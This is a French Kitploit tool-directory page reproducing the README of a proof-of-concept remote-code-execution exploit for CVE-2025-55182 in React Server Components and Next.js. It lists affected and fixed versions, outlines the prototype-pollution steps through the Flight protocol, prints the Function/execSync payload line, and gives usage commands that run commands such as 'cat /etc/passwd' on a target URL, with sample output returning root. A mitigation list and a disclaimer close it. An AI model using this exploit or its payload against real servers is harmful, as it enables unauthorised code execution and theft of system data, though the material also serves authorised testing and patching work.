Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182_PoC — Proof-of-Concept RCE pour CVE‑2025‑55182 exploitant le protocole React Flight sur Next.js App Router. | Kitploit
Outils/GitHubGitHub/rl0x01/cve-2025-55182_poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

Proof-of-Concept RCE pour CVE‑2025‑55182 exploitant le protocole React Flight sur Next.js App Router.

Voir le dépôt
12il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-55182 - PoC RCE des React Server Components

Auteur : rl0x01

Description

CVE-2025-55182 est une vulnérabilité critique (CVSS 10.0) d'exécution de code à distance (RCE) affectant les React Server Components via le protocole Flight.

Versions vulnérables

Next.jsReact
14.3.0-canary.77 à 15.0.419.0.0
15.1.1-canary.0 à 15.1.819.1.0
15.2.0-canary.0 à 15.2.519.1.1
15.3.0-canary.0 à 15.3.519.2.0
15.4.0-canary.0 à 15.4.7
15.5.1-canary.0 à 15.5.6
16.0.0-canary.0 à 16.0.6

Versions corrigées

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

Mécanisme d'exploitation

  1. Utilise $@ pour obtenir une référence brute Chunk
  2. Écrase .then avec Chunk.prototype.then via $1:__proto__:then
  3. Définit status sur resolved_model pour déclencher initializeModelChunk
  4. Utilise $B1337 pour déclencher la désérialisation Blob
  5. Pointe _formData.get vers le constructeur Function
  6. _prefix contient le code JS à exécuter

Le code est évalué via :

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

Installation

root@kitploit:~
pip install -r requirements.txt

Usage

Vérifier si la cible est vulnérable

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

Exécuter une commande

root@kitploit:~
# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

Options

OptionDescription
urlURL cible (obligatoire)
-c, --commandCommande à exécuter (par défaut : id)
--check-onlyVérifier uniquement la vulnérabilité
-t, --timeoutDélai d'attente en secondes (par défaut : 15)
-v, --verboseSortie détaillée
--rawAfficher la réponse brute

Laboratoire de test vulnérable

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000

Exemple de sortie

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================

Structure du projet

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # Main exploit script
├── requirements.txt          # Python dependencies
├── README.md                 # Documentation
└── vulnerable-app/           # Vulnerable Next.js app for testing
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

Avertissement

⚠️ Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

L'utilisation non autorisée de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation explicite de test est illégale.

Atténuation

  1. Mettez à jour Next.js vers 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+ ou 16.0.7+
  2. Mettez à jour React vers une version corrigée
  3. Implémentez des règles WAF pour bloquer les payloads malveillants du protocole Flight
Télécharger l’outil